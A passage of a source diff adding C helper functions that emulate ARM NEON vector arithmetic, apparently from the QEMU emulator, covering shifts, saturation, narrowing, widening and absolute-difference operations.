+NEON_POP(pmax_u8, neon_u8, 4) +NEON_POP(pmax_s16, neon_s16, 2) +NEON_POP(pmax_u16, neon_u16, 2) +#undef NEON_FN + +#define NEON_FN(dest, src1, src2) \ + dest = (src1 > src2) ? ((int64_t)src1 - (int64_t)src2) : ((int64_t)src2 - (int64_t)src1) +NEON_VOP(abd_s8, neon_s8, 4) +NEON_VOP(abd_u8, neon_u8, 4) +NEON_VOP(abd_s16, neon_s16, 2) +NEON_VOP(abd_u16, neon_u16, 2) +NEON_VOP(abd_s32, neon_s32, 1) +NEON_VOP(abd_u32, neon_u32, 1) +#undef NEON_FN + +#define NEON_FN(dest, src1, src2) do { \ + int8_t tmp; \ + tmp = (int8_t)src2; \ + if (tmp >= (ssize_t)sizeof(src1) * 8 || \ + tmp <= -(ssize_t)sizeof(src1) * 8) { \ + dest = 0; \ + } else if (tmp < 0) { \ + dest = src1 >> -tmp; \ + } else { \ + dest = src1 << tmp; \ + }} while (0) +NEON_VOP(shl_u8, neon_u8, 4) +NEON_VOP(shl_u16, neon_u16, 2) +NEON_VOP(shl_u32, neon_u32, 1) +#undef NEON_FN + +uint64_t HELPER(neon_shl_u64)(uint64_t val, uint64_t shiftop) +{ + int8_t shift = (int8_t)shiftop; + if (shift >= 64 || shift <= -64) { + val = 0; + } else if (shift < 0) { + val >>= -shift; + } else { + val <<= shift; + } + return val; +} + +#define NEON_FN(dest, src1, src2) do { \ + int8_t tmp; \ + tmp = (int8_t)src2; \ + if (tmp >= (ssize_t)sizeof(src1) * 8) { \ + dest = 0; \ + } else if (tmp <= -(ssize_t)sizeof(src1) * 8) { \ + dest = src1 >> (sizeof(src1) * 8 - 1); \ + } else if (tmp < 0) { \ + dest = src1 >> -tmp; \ + } else { \ + dest = src1 << tmp; \ + }} while (0) +NEON_VOP(shl_s8, neon_s8, 4) +NEON_VOP(shl_s16, neon_s16, 2) +NEON_VOP(shl_s32, neon_s32, 1) +#undef NEON_FN + +uint64_t HELPER(neon_shl_s64)(uint64_t valop, uint64_t shiftop) +{ + int8_t shift = (int8_t)shiftop; + uint64_t val = valop; + if (shift >= 64) { + val = 0; + } else if (shift <= -64) { + val >>= 63; + } else if (shift < 0) { + val >>= -shift; + } else { + val <<= shift; + } + return val; +} + +#define NEON_FN(dest, src1, src2) do { \ + int8_t tmp; \ + tmp = (int8_t)src2; \ + if ((tmp >= (ssize_t)sizeof(src1) * 8) \ + || (tmp <= -(ssize_t)sizeof(src1) * 8)) { \ + dest = 0; \ + } else if (tmp < 0) { \ + dest = (src1 + (1 << (-1 - tmp))) >> -tmp; \ + } else { \ + dest = (uint64_t)src1 << tmp; \ + }} while (0) +NEON_VOP(rshl_s8, neon_s8, 4) +NEON_VOP(rshl_s16, neon_s16, 2) +#undef NEON_FN + +/* The addition of the rounding constant may overflow, so we use an + * intermediate 64 bit accumulator. */ +uint32_t HELPER(neon_rshl_s32)(uint32_t valop, uint32_t shiftop) +{ + uint32_t dest; + int32_t val = (int32_t)valop; + int8_t shift = (int8_t)shiftop; + if ((shift >= 32) || (shift <= -32)) { + dest = 0; + } else if (shift < 0) { + int64_t big_dest = ((int64_t)val + (1ULL << (-1 - shift))); + dest = big_dest >> -shift; + } else { + dest = (uint32_t)val << shift; + } + return dest; +} + +/* Handling addition overflow with 64 bit input values is more + * tricky than with 32 bit values. */ +uint64_t HELPER(neon_rshl_s64)(uint64_t valop, uint64_t shiftop) +{ + int8_t shift = (int8_t)shiftop; + int64_t val = valop; + if ((shift >= 64) || (shift <= -64)) { + val = 0; + } else if (shift < 0) { + val >>= (-shift - 1); + if (val == INT64_MAX) { + /* In this case, it means that the rounding constant is 1, + * and the addition would overflow. Return the actual + * result directly. */ + val = 0x4000000000000000LL; + } else { + val++; + val >>= 1; + } + } else { + val = ((uint64_t)val) << shift; + } + return val; +} + +#define NEON_FN(dest, src1, src2) do { \ + int8_t tmp; \ + tmp = (int8_t)src2; \ + if (tmp >= (ssize_t)sizeof(src1) * 8 || \ + tmp < -(ssize_t)sizeof(src1) * 8) { \ + dest = 0; \ + } else if (tmp == -(ssize_t)sizeof(src1) * 8) { \ + dest = src1 >> (-tmp - 1); \ + } else if (tmp < 0) { \ + dest = (src1 + (1 << (-1 - tmp))) >> -tmp; \ + } else { \ + dest = src1 << tmp; \ + }} while (0) +NEON_VOP(rshl_u8, neon_u8, 4) +NEON_VOP(rshl_u16, neon_u16, 2) +#undef NEON_FN + +/* The addition of the rounding constant may overflow, so we use an + * intermediate 64 bit accumulator. */ +uint32_t HELPER(neon_rshl_u32)(uint32_t val, uint32_t shiftop) +{ + uint32_t dest; + int8_t shift = (int8_t)shiftop; + if (shift >= 32 || shift < -32) { + dest = 0; + } else if (shift == -32) { + dest = val >> 31; + } else if (shift < 0) { + uint64_t big_dest = ((uint64_t)val + (1ULL << (-1 - shift))); + dest = big_dest >> -shift; + } else { + dest = val << shift; + } + return dest; +} + +/* Handling addition overflow with 64 bit input values is more + * tricky than with 32 bit values. */ +uint64_t HELPER(neon_rshl_u64)(uint64_t val, uint64_t shiftop) +{ + int8_t shift = (uint8_t)shiftop; + if (shift >= 64 || shift < -64) { + val = 0; + } else if (shift == -64) { + /* Rounding a 1-bit result just preserves that bit. */ + val >>= 63; + } else if (shift < 0) { + val >>= (-shift - 1); + if (val == UINT64_MAX) { + /* In this case, it means that the rounding constant is 1, + * and the addition would overflow. Return the actual + * result directly. */ + val = 0x8000000000000000ULL; + } else { + val++; + val >>= 1; + } + } else { + val <<= shift; + } + return val; +} + +#define NEON_FN(dest, src1, src2) do { \ + int8_t tmp; \ + tmp = (int8_t)src2; \ + if (tmp >= (ssize_t)sizeof(src1) * 8) { \ + if (src1) { \ + SET_QC(); \ + dest = ~0; \ + } else { \ + dest = 0; \ + } \ + } else if (tmp <= -(ssize_t)sizeof(src1) * 8) { \ + dest = 0; \ + } else if (tmp < 0) { \ + dest = src1 >> -tmp; \ + } else { \ + dest = src1 << tmp; \ + if ((dest >> tmp) != src1) { \ + SET_QC(); \ + dest = ~0; \ + } \ + }} while (0) +NEON_VOP_ENV(qshl_u8, neon_u8, 4) +NEON_VOP_ENV(qshl_u16, neon_u16, 2) +NEON_VOP_ENV(qshl_u32, neon_u32, 1) +#undef NEON_FN + +uint64_t HELPER(neon_qshl_u64)(CPUARMState *env, uint64_t val, uint64_t shiftop) +{ + int8_t shift = (int8_t)shiftop; + if (shift >= 64) { + if (val) { + val = ~(uint64_t)0; + SET_QC(); + } + } else if (shift <= -64) { + val = 0; + } else if (shift < 0) { + val >>= -shift; + } else { + uint64_t tmp = val; + val <<= shift; + if ((val >> shift) != tmp) { + SET_QC(); + val = ~(uint64_t)0; + } + } + return val; +} + +#define NEON_FN(dest, src1, src2) do { \ + int8_t tmp; \ + tmp = (int8_t)src2; \ + if (tmp >= (ssize_t)sizeof(src1) * 8) { \ + if (src1) { \ + SET_QC(); \ + dest = (uint32_t)(1U << (sizeof(src1) * 8 - 1)); \ + if (src1 > 0) { \ + dest--; \ + } \ + } else { \ + dest = src1; \ + } \ + } else if (tmp <= -(ssize_t)sizeof(src1) * 8) { \ + dest = src1 >> 31; \ + } else if (tmp < 0) { \ + dest = src1 >> -tmp; \ + } else { \ + dest = (uint32_t)src1 << tmp; \ + if ((dest >> tmp) != src1) { \ + SET_QC(); \ + dest = (uint32_t)(1 << (sizeof(src1) * 8 - 1)); \ + if (src1 > 0) { \ + dest--; \ + } \ + } \ + }} while (0) +NEON_VOP_ENV(qshl_s8, neon_s8, 4) +NEON_VOP_ENV(qshl_s16, neon_s16, 2) +NEON_VOP_ENV(qshl_s32, neon_s32, 1) +#undef NEON_FN + +uint64_t HELPER(neon_qshl_s64)(CPUARMState *env, uint64_t valop, uint64_t shiftop) +{ + int8_t shift = (uint8_t)shiftop; + uint64_t val = valop; + if (shift >= 64) { + if (val) { + SET_QC(); + val = (val >> 63) ^ ~SIGNBIT64; + } + } else if (shift <= -64) { + val >>= 63; + } else if (shift < 0) { + val >>= -shift; + } else { + int64_t tmp = val; + val <<= shift; + if ((val >> shift) != tmp) { + SET_QC(); + val = (tmp >> 63) ^ ~SIGNBIT64; + } + } + return val; +} + +#define NEON_FN(dest, src1, src2) do { \ + if (src1 & (1 << (sizeof(src1) * 8 - 1))) { \ + SET_QC(); \ + dest = 0; \ + } else { \ + int8_t tmp; \ + tmp = (int8_t)src2; \ + if (tmp >= (ssize_t)sizeof(src1) * 8) { \ + if (src1) { \ + SET_QC(); \ + dest = ~0; \ + } else { \ + dest = 0; \ + } \ + } else if (tmp <= -(ssize_t)sizeof(src1) * 8) { \ + dest = 0; \ + } else if (tmp < 0) { \ + dest = src1 >> -tmp; \ + } else { \ + dest = src1 << tmp; \ + if ((dest >> tmp) != src1) { \ + SET_QC(); \ + dest = ~0; \ + } \ + } \ + }} while (0) +NEON_VOP_ENV(qshlu_s8, neon_u8, 4) +NEON_VOP_ENV(qshlu_s16, neon_u16, 2) +#undef NEON_FN + +uint32_t HELPER(neon_qshlu_s32)(CPUARMState *env, uint32_t valop, uint32_t shiftop) +{ + if ((int32_t)valop < 0) { + SET_QC(); + return 0; + } + return helper_neon_qshl_u32(env, valop, shiftop); +} + +uint64_t HELPER(neon_qshlu_s64)(CPUARMState *env, uint64_t valop, uint64_t shiftop) +{ + if ((int64_t)valop < 0) { + SET_QC(); + return 0; + } + return helper_neon_qshl_u64(env, valop, shiftop); +} + +#define NEON_FN(dest, src1, src2) do { \ + int8_t tmp; \ + tmp = (int8_t)src2; \ + if (tmp >= (ssize_t)sizeof(src1) * 8) { \ + if (src1) { \ + SET_QC(); \ + dest = ~0; \ + } else { \ + dest = 0; \ + } \ + } else if (tmp < -(ssize_t)sizeof(src1) * 8) { \ + dest = 0; \ + } else if (tmp == -(ssize_t)sizeof(src1) * 8) { \ + dest = src1 >> (sizeof(src1) * 8 - 1); \ + } else if (tmp < 0) { \ + dest = (src1 + (1 << (-1 - tmp))) >> -tmp; \ + } else { \ + dest = src1 << tmp; \ + if ((dest >> tmp) != src1) { \ + SET_QC(); \ + dest = ~0; \ + } \ + }} while (0) +NEON_VOP_ENV(qrshl_u8, neon_u8, 4) +NEON_VOP_ENV(qrshl_u16, neon_u16, 2) +#undef NEON_FN + +/* The addition of the rounding constant may overflow, so we use an + * intermediate 64 bit accumulator. */ +uint32_t HELPER(neon_qrshl_u32)(CPUARMState *env, uint32_t val, uint32_t shiftop) +{ + uint32_t dest; + int8_t shift = (int8_t)shiftop; + if (shift >= 32) { + if (val) { + SET_QC(); + dest = ~0; + } else { + dest = 0; + } + } else if (shift < -32) { + dest = 0; + } else if (shift == -32) { + dest = val >> 31; + } else if (shift < 0) { + uint64_t big_dest = ((uint64_t)val + (1ULL << (-1 - shift))); + dest = big_dest >> -shift; + } else { + dest = val << shift; + if ((dest >> shift) != val) { + SET_QC(); + dest = ~0; + } + } + return dest; +} + +/* Handling addition overflow with 64 bit input values is more + * tricky than with 32 bit values. */ +uint64_t HELPER(neon_qrshl_u64)(CPUARMState *env, uint64_t val, uint64_t shiftop) +{ + int8_t shift = (int8_t)shiftop; + if (shift >= 64) { + if (val) { + SET_QC(); + val = ~0; + } + } else if (shift < -64) { + val = 0; + } else if (shift == -64) { + val >>= 63; + } else if (shift < 0) { + val >>= (-shift - 1); + if (val == UINT64_MAX) { + /* In this case, it means that the rounding constant is 1, + * and the addition would overflow. Return the actual + * result directly. */ + val = 0x8000000000000000ULL; + } else { + val++; + val >>= 1; + } + } else { \ + uint64_t tmp = val; + val <<= shift; + if ((val >> shift) != tmp) { + SET_QC(); + val = ~0; + } + } + return val; +} + +#define NEON_FN(dest, src1, src2) do { \ + int8_t tmp; \ + tmp = (int8_t)src2; \ + if (tmp >= (ssize_t)sizeof(src1) * 8) { \ + if (src1) { \ + SET_QC(); \ + dest = (uint32_t)(1U << (sizeof(src1) * 8 - 1)); \ + if (src1 > 0) { \ + dest--; \ + } \ + } else { \ + dest = 0; \ + } \ + } else if (tmp <= -(ssize_t)sizeof(src1) * 8) { \ + dest = 0; \ + } else if (tmp < 0) { \ + dest = (src1 + (1 << (-1 - tmp))) >> -tmp; \ + } else { \ + dest = ((uint64_t)src1) << tmp; \ + if ((dest >> tmp) != src1) { \ + SET_QC(); \ + dest = (uint32_t)(1U << (sizeof(src1) * 8 - 1)); \ + if (src1 > 0) { \ + dest--; \ + } \ + } \ + }} while (0) +NEON_VOP_ENV(qrshl_s8, neon_s8, 4) +NEON_VOP_ENV(qrshl_s16, neon_s16, 2) +#undef NEON_FN + +/* The addition of the rounding constant may overflow, so we use an + * intermediate 64 bit accumulator. */ +uint32_t HELPER(neon_qrshl_s32)(CPUARMState *env, uint32_t valop, uint32_t shiftop) +{ + int32_t dest; + int32_t val = (int32_t)valop; + int8_t shift = (int8_t)shiftop; + if (shift >= 32) { + if (val) { + SET_QC(); + dest = (val >> 31) ^ ~SIGNBIT; + } else { + dest = 0; + } + } else if (shift <= -32) { + dest = 0; + } else if (shift < 0) { + int64_t big_dest = ((int64_t)val + (1ULL << (-1 - shift))); + dest = big_dest >> -shift; + } else { + dest = val << shift; + if ((dest >> shift) != val) { + SET_QC(); + dest = (val >> 31) ^ ~SIGNBIT; + } + } + return dest; +} + +/* Handling addition overflow with 64 bit input values is more + * tricky than with 32 bit values. */ +uint64_t HELPER(neon_qrshl_s64)(CPUARMState *env, uint64_t valop, uint64_t shiftop) +{ + int8_t shift = (uint8_t)shiftop; + int64_t val = valop; + + if (shift >= 64) { + if (val) { + SET_QC(); + val = (val >> 63) ^ ~SIGNBIT64; + } + } else if (shift <= -64) { + val = 0; + } else if (shift < 0) { + val >>= (-shift - 1); + if (val == INT64_MAX) { + /* In this case, it means that the rounding constant is 1, + * and the addition would overflow. Return the actual + * result directly. */ + val = 0x4000000000000000ULL; + } else { + val++; + val >>= 1; + } + } else { + int64_t tmp = val; + val = (uint64_t)val << (shift & 0x3f); + if ((val >> shift) != tmp) { + SET_QC(); + val = (tmp >> 63) ^ ~SIGNBIT64; + } + } + return val; +} + +uint32_t HELPER(neon_add_u8)(uint32_t a, uint32_t b) +{ + uint32_t mask; + mask = (a ^ b) & 0x80808080u; + a &= ~0x80808080u; + b &= ~0x80808080u; + return (a + b) ^ mask; +} + +uint32_t HELPER(neon_add_u16)(uint32_t a, uint32_t b) +{ + uint32_t mask; + mask = (a ^ b) & 0x80008000u; + a &= ~0x80008000u; + b &= ~0x80008000u; + return (a + b) ^ mask; +} + +#define NEON_FN(dest, src1, src2) dest = src1 + src2 +NEON_POP(padd_u8, neon_u8, 4) +NEON_POP(padd_u16, neon_u16, 2) +#undef NEON_FN + +#define NEON_FN(dest, src1, src2) dest = src1 - src2 +NEON_VOP(sub_u8, neon_u8, 4) +NEON_VOP(sub_u16, neon_u16, 2) +#undef NEON_FN + +#define NEON_FN(dest, src1, src2) dest = (int64_t)src1 * src2 +NEON_VOP(mul_u8, neon_u8, 4) +NEON_VOP(mul_u16, neon_u16, 2) +#undef NEON_FN + +/* Polynomial multiplication is like integer multiplication except the + partial products are XORed, not added. */ +uint32_t HELPER(neon_mul_p8)(uint32_t op1, uint32_t op2) +{ + uint32_t mask; + uint32_t result; + result = 0; + while (op1) { + mask = 0; + if (op1 & 1) + mask |= 0xff; + if (op1 & (1 << 8)) + mask |= (0xff << 8); + if (op1 & (1 << 16)) + mask |= (0xff << 16); + if (op1 & (1 << 24)) + mask |= (0xff << 24); + result ^= op2 & mask; + op1 = (op1 >> 1) & 0x7f7f7f7f; + op2 = (op2 << 1) & 0xfefefefe; + } + return result; +} + +uint64_t HELPER(neon_mull_p8)(uint32_t op1, uint32_t op2) +{ + uint64_t result = 0; + uint64_t mask; + uint64_t op2ex = op2; + op2ex = (op2ex & 0xff) | + ((op2ex & 0xff00) << 8) | + ((op2ex & 0xff0000) << 16) | + ((op2ex & 0xff000000) << 24); + while (op1) { + mask = 0; + if (op1 & 1) { + mask |= 0xffff; + } + if (op1 & (1 << 8)) { + mask |= (0xffffU << 16); + } + if (op1 & (1 << 16)) { + mask |= (0xffffULL << 32); + } + if (op1 & (1 << 24)) { + mask |= (0xffffULL << 48); + } + result ^= op2ex & mask; + op1 = (op1 >> 1) & 0x7f7f7f7f; + op2ex <<= 1; + } + return result; +} + +#define NEON_FN(dest, src1, src2) dest = (src1 & src2) ? -1 : 0 +NEON_VOP(tst_u8, neon_u8, 4) +NEON_VOP(tst_u16, neon_u16, 2) +NEON_VOP(tst_u32, neon_u32, 1) +#undef NEON_FN + +#define NEON_FN(dest, src1, src2) dest = (src1 == src2) ? -1 : 0 +NEON_VOP(ceq_u8, neon_u8, 4) +NEON_VOP(ceq_u16, neon_u16, 2) +NEON_VOP(ceq_u32, neon_u32, 1) +#undef NEON_FN + +#define NEON_FN(dest, src, dummy) dest = (src < 0) ? -src : src +NEON_VOP1(abs_s8, neon_s8, 4) +NEON_VOP1(abs_s16, neon_s16, 2) +#undef NEON_FN + +/* Count Leading Sign/Zero Bits. */ +static inline int do_clz8(uint8_t x) +{ + int n; + for (n = 8; x; n--) + x >>= 1; + return n; +} + +static inline int do_clz16(uint16_t x) +{ + int n; + for (n = 16; x; n--) + x >>= 1; + return n; +} + +#define NEON_FN(dest, src, dummy) dest = do_clz8(src) +NEON_VOP1(clz_u8, neon_u8, 4) +#undef NEON_FN + +#define NEON_FN(dest, src, dummy) dest = do_clz16(src) +NEON_VOP1(clz_u16, neon_u16, 2) +#undef NEON_FN + +#define NEON_FN(dest, src, dummy) dest = do_clz8((src < 0) ? ~src : src) - 1 +NEON_VOP1(cls_s8, neon_s8, 4) +#undef NEON_FN + +#define NEON_FN(dest, src, dummy) dest = do_clz16((src < 0) ? ~src : src) - 1 +NEON_VOP1(cls_s16, neon_s16, 2) +#undef NEON_FN + +uint32_t HELPER(neon_cls_s32)(uint32_t x) +{ + int count; + if ((int32_t)x < 0) + x = ~x; + for (count = 32; x; count--) + x = x >> 1; + return count - 1; +} + +/* Bit count. */ +uint32_t HELPER(neon_cnt_u8)(uint32_t x) +{ + x = (x & 0x55555555) + ((x >> 1) & 0x55555555); + x = (x & 0x33333333) + ((x >> 2) & 0x33333333); + x = (x & 0x0f0f0f0f) + ((x >> 4) & 0x0f0f0f0f); + return x; +} + +/* Reverse bits in each 8 bit word */ +uint32_t HELPER(neon_rbit_u8)(uint32_t x) +{ + x = ((x & 0xf0f0f0f0) >> 4) + | ((x & 0x0f0f0f0f) << 4); + x = ((x & 0x88888888) >> 3) + | ((x & 0x44444444) >> 1) + | ((x & 0x22222222) << 1) + | ((x & 0x11111111) << 3); + return x; +} + +#define NEON_QDMULH16(dest, src1, src2, round) do { \ + uint32_t tmp = (int32_t)(int16_t) src1 * (int16_t) src2; \ + if ((tmp ^ (tmp << 1)) & SIGNBIT) { \ + SET_QC(); \ + tmp = (tmp >> 31) ^ ~SIGNBIT; \ + } else { \ + tmp <<= 1; \ + } \ + if (round) { \ + int32_t old = tmp; \ + tmp += 1 << 15; \ + if ((int32_t)tmp < old) { \ + SET_QC(); \ + tmp = SIGNBIT - 1; \ + } \ + } \ + dest = tmp >> 16; \ + } while(0) +#define NEON_FN(dest, src1, src2) NEON_QDMULH16(dest, src1, src2, 0) +NEON_VOP_ENV(qdmulh_s16, neon_s16, 2) +#undef NEON_FN +#define NEON_FN(dest, src1, src2) NEON_QDMULH16(dest, src1, src2, 1) +NEON_VOP_ENV(qrdmulh_s16, neon_s16, 2) +#undef NEON_FN +#undef NEON_QDMULH16 + +#define NEON_QDMULH32(dest, src1, src2, round) do { \ + uint64_t tmp = (int64_t)(int32_t) src1 * (int32_t) src2; \ + if ((tmp ^ (tmp << 1)) & SIGNBIT64) { \ + SET_QC(); \ + tmp = (tmp >> 63) ^ ~SIGNBIT64; \ + } else { \ + tmp <<= 1; \ + } \ + if (round) { \ + int64_t old = tmp; \ + tmp += (int64_t)1 << 31; \ + if ((int64_t)tmp < old) { \ + SET_QC(); \ + tmp = SIGNBIT64 - 1; \ + } \ + } \ + dest = tmp >> 32; \ + } while(0) +#define NEON_FN(dest, src1, src2) NEON_QDMULH32(dest, src1, src2, 0) +NEON_VOP_ENV(qdmulh_s32, neon_s32, 1) +#undef NEON_FN +#define NEON_FN(dest, src1, src2) NEON_QDMULH32(dest, src1, src2, 1) +NEON_VOP_ENV(qrdmulh_s32, neon_s32, 1) +#undef NEON_FN +#undef NEON_QDMULH32 + +uint32_t HELPER(neon_narrow_u8)(uint64_t x) +{ + return (x & 0xffu) | ((x >> 8) & 0xff00u) | ((x >> 16) & 0xff0000u) + | ((x >> 24) & 0xff000000u); +} + +uint32_t HELPER(neon_narrow_u16)(uint64_t x) +{ + return (x & 0xffffu) | ((x >> 16) & 0xffff0000u); +} + +uint32_t HELPER(neon_narrow_high_u8)(uint64_t x) +{ + return ((x >> 8) & 0xff) | ((x >> 16) & 0xff00) + | ((x >> 24) & 0xff0000) | ((x >> 32) & 0xff000000); +} + +uint32_t HELPER(neon_narrow_high_u16)(uint64_t x) +{ + return ((x >> 16) & 0xffff) | ((x >> 32) & 0xffff0000); +} + +uint32_t HELPER(neon_narrow_round_high_u8)(uint64_t x) +{ + x &= 0xff80ff80ff80ff80ull; + x += 0x0080008000800080ull; + return ((x >> 8) & 0xff) | ((x >> 16) & 0xff00) + | ((x >> 24) & 0xff0000) | ((x >> 32) & 0xff000000); +} + +uint32_t HELPER(neon_narrow_round_high_u16)(uint64_t x) +{ + x &= 0xffff8000ffff8000ull; + x += 0x0000800000008000ull; + return ((x >> 16) & 0xffff) | ((x >> 32) & 0xffff0000); +} + +uint32_t HELPER(neon_unarrow_sat8)(CPUARMState *env, uint64_t x) +{ + uint16_t s; + uint8_t d; + uint32_t res = 0; +#define SAT8(n) \ + s = x >> n; \ + if (s & 0x8000) { \ + SET_QC(); \ + } else { \ + if (s > 0xff) { \ + d = 0xff; \ + SET_QC(); \ + } else { \ + d = s; \ + } \ + res |= (uint32_t)d << (n / 2); \ + } + + SAT8(0); + SAT8(16); + SAT8(32); + SAT8(48); +#undef SAT8 + return res; +} + +uint32_t HELPER(neon_narrow_sat_u8)(CPUARMState *env, uint64_t x) +{ + uint16_t s; + uint8_t d; + uint32_t res = 0; +#define SAT8(n) \ + s = x >> n; \ + if (s > 0xff) { \ + d = 0xff; \ + SET_QC(); \ + } else { \ + d = s; \ + } \ + res |= (uint32_t)d << (n / 2); + + SAT8(0); + SAT8(16); + SAT8(32); + SAT8(48); +#undef SAT8 + return res; +} + +uint32_t HELPER(neon_narrow_sat_s8)(CPUARMState *env, uint64_t x) +{ + int16_t s; + uint8_t d; + uint32_t res = 0; +#define SAT8(n) \ + s = x >> n; \ + if (s != (int8_t)s) { \ + d = (s >> 15) ^ 0x7f; \ + SET_QC(); \ + } else { \ + d = s; \ + } \ + res |= (uint32_t)d << (n / 2); + + SAT8(0); + SAT8(16); + SAT8(32); + SAT8(48); +#undef SAT8 + return res; +} + +uint32_t HELPER(neon_unarrow_sat16)(CPUARMState *env, uint64_t x) +{ + uint32_t high; + uint32_t low; + low = x; + if (low & 0x80000000) { + low = 0; + SET_QC(); + } else if (low > 0xffff) { + low = 0xffff; + SET_QC(); + } + high = x >> 32; + if (high & 0x80000000) { + high = 0; + SET_QC(); + } else if (high > 0xffff) { + high = 0xffff; + SET_QC(); + } + return low | (high << 16); +} + +uint32_t HELPER(neon_narrow_sat_u16)(CPUARMState *env, uint64_t x) +{ + uint32_t high; + uint32_t low; + low = x; + if (low > 0xffff) { + low = 0xffff; + SET_QC(); + } + high = x >> 32; + if (high > 0xffff) { + high = 0xffff; + SET_QC(); + } + return low | (high << 16); +} + +uint32_t HELPER(neon_narrow_sat_s16)(CPUARMState *env, uint64_t x) +{ + int32_t low; + int32_t high; + low = x; + if (low != (int16_t)low) { + low = (low >> 31) ^ 0x7fff; + SET_QC(); + } + high = x >> 32; + if (high != (int16_t)high) { + high = (high >> 31) ^ 0x7fff; + SET_QC(); + } + return (uint16_t)low | (high << 16); +} + +uint32_t HELPER(neon_unarrow_sat32)(CPUARMState *env, uint64_t x) +{ + if (x & 0x8000000000000000ull) { + SET_QC(); + return 0; + } + if (x > 0xffffffffu) { + SET_QC(); + return 0xffffffffu; + } + return x; +} + +uint32_t HELPER(neon_narrow_sat_u32)(CPUARMState *env, uint64_t x) +{ + if (x > 0xffffffffu) { + SET_QC(); + return 0xffffffffu; + } + return x; +} + +uint32_t HELPER(neon_narrow_sat_s32)(CPUARMState *env, uint64_t x) +{ + if ((int64_t)x != (int32_t)x) { + SET_QC(); + return ((int64_t)x >> 63) ^ 0x7fffffff; + } + return x; +} + +uint64_t HELPER(neon_widen_u8)(uint32_t x) +{ + uint64_t tmp; + uint64_t ret; + ret = (uint8_t)x; + tmp = (uint8_t)(x >> 8); + ret |= tmp << 16; + tmp = (uint8_t)(x >> 16); + ret |= tmp << 32; + tmp = (uint8_t)(x >> 24); + ret |= tmp << 48; + return ret; +} + +uint64_t HELPER(neon_widen_s8)(uint32_t x) +{ + uint64_t tmp; + uint64_t ret; + ret = (uint16_t)(int8_t)x; + tmp = (uint16_t)(int8_t)(x >> 8); + ret |= tmp << 16; + tmp = (uint16_t)(int8_t)(x >> 16); + ret |= tmp << 32; + tmp = (uint16_t)(int8_t)(x >> 24); + ret |= tmp << 48; + return ret; +} + +uint64_t HELPER(neon_widen_u16)(uint32_t x) +{ + uint64_t high = (uint16_t)(x >> 16); + return ((uint16_t)x) | (high << 32); +} + +uint64_t HELPER(neon_widen_s16)(uint32_t x) +{ + uint64_t high = (int16_t)(x >> 16); + return ((uint32_t)(int16_t)x) | (high << 32); +} + +uint64_t HELPER(neon_addl_u16)(uint64_t a, uint64_t b) +{ + uint64_t mask; + mask = (a ^ b) & 0x8000800080008000ull; + a &= ~0x8000800080008000ull; + b &= ~0x8000800080008000ull; + return (a + b) ^ mask; +} + +uint64_t HELPER(neon_addl_u32)(uint64_t a, uint64_t b) +{ + uint64_t mask; + mask = (a ^ b) & 0x8000000080000000ull; + a &= ~0x8000000080000000ull; + b &= ~0x8000000080000000ull; + return (a + b) ^ mask; +} + +uint64_t HELPER(neon_paddl_u16)(uint64_t a, uint64_t b) +{ + uint64_t tmp; + uint64_t tmp2; + + tmp = a & 0x0000ffff0000ffffull; + tmp += (a >> 16) & 0x0000ffff0000ffffull; + tmp2 = b & 0xffff0000ffff0000ull; + tmp2 += (b << 16) & 0xffff0000ffff0000ull; + return ( tmp & 0xffff) + | ((tmp >> 16) & 0xffff0000ull) + | ((tmp2 << 16) & 0xffff00000000ull) + | ( tmp2 & 0xffff000000000000ull); +} + +uint64_t HELPER(neon_paddl_u32)(uint64_t a, uint64_t b) +{ + uint32_t low = a + (a >> 32); + uint32_t high = b + (b >> 32); + return low + ((uint64_t)high << 32); +} + +uint64_t HELPER(neon_subl_u16)(uint64_t a, uint64_t b) +{ + uint64_t mask; + mask = (a ^ ~b) & 0x8000800080008000ull; + a |= 0x8000800080008000ull; + b &= ~0x8000800080008000ull; + return (a - b) ^ mask; +} + +uint64_t HELPER(neon_subl_u32)(uint64_t a, uint64_t b) +{ + uint64_t mask; + mask = (a ^ ~b) & 0x8000000080000000ull; + a |= 0x8000000080000000ull; + b &= ~0x8000000080000000ull; + return (a - b) ^ mask; +} + +uint64_t HELPER(neon_addl_saturate_s32)(CPUARMState *env, uint64_t a, uint64_t b) +{ + uint32_t x, y; + uint32_t low, high; + + x = a; + y = b; + low = x + y; + if (((low ^ x) & SIGNBIT) && !((x ^ y) & SIGNBIT)) { + SET_QC(); + low = ((int32_t)x >> 31) ^ ~SIGNBIT; + } + x = a >> 32; + y = b >> 32; + high = x + y; + if (((high ^ x) & SIGNBIT) && !((x ^ y) & SIGNBIT)) { + SET_QC(); + high = ((int32_t)x >> 31) ^ ~SIGNBIT; + } + return low | ((uint64_t)high << 32); +} + +uint64_t HELPER(neon_addl_saturate_s64)(CPUARMState *env, uint64_t a, uint64_t b) +{ + uint64_t result; + + result = a + b; + if (((result ^ a) & SIGNBIT64) && !((a ^ b) & SIGNBIT64)) { + SET_QC(); + result = ((int64_t)a >> 63) ^ ~SIGNBIT64; + } + return result; +} + +/* We have to do the arithmetic in a larger type than + * the input type, because for example with a signed 32 bit + * op the absolute difference can overflow a signed 32 bit value. + */ +#define DO_ABD(dest, x, y, intype, arithtype) do { \ + arithtype tmp_x = (intype)(x); \ + arithtype tmp_y = (intype)(y); \ + dest = ((tmp_x > tmp_y) ? tmp_x - tmp_y : tmp_y - tmp_x); \ + } while(0) + +uint64_t HELPER(neon_abdl_u16)(uint32_t a, uint32_t b) +{ + uint64_t tmp; + uint64_t result; + DO_ABD(result, a, b, uint8_t, uint32_t); + DO_ABD(tmp, a >> 8, b >> 8, uint8_t, uint32_t); + result |= tmp << 16; + DO_ABD(tmp, a >> 16, b >> 16, uint8_t, uint32_t); + result |= tmp << 32; + DO_ABD(tmp, a >> 24, b >> 24, uint8_t, uint32_t); + result |= tmp << 48; + return result; +} + +uint64_t HELPER(neon_abdl_s16)(uint32_t a, uint32_t b) +{ + uint64_t tmp; + uint64_t result; + DO_ABD(result, a, b, int8_t, int32_t); + DO_ABD(tmp, a >> 8, b >> 8, int8_t, int32_t); + result |= tmp << 16; + DO_ABD(tmp, a >> 16, b >> 16, int8_t, int32_t); + result |= tmp << 32; + DO_ABD(tmp, a >> 24, b >> 24, int8_t, int32_t); + result |= tmp << 48; + return result; +} + +uint64_t HELPER(neon_abdl_u32)(uint32_t a, uint32_t b) +{ + uint64_t tmp; + uint64_t result; + DO_ABD(result, a, b, uint16_t, uint32_t); + DO_ABD(tmp, a >> 16, b >> 16, uint16_t, uint32_t); + return result | (tmp << 32); +} + +uint64_t HELPER(neon_abdl_s32)(uint32_t a, uint32_t b) +{ + uint64_t 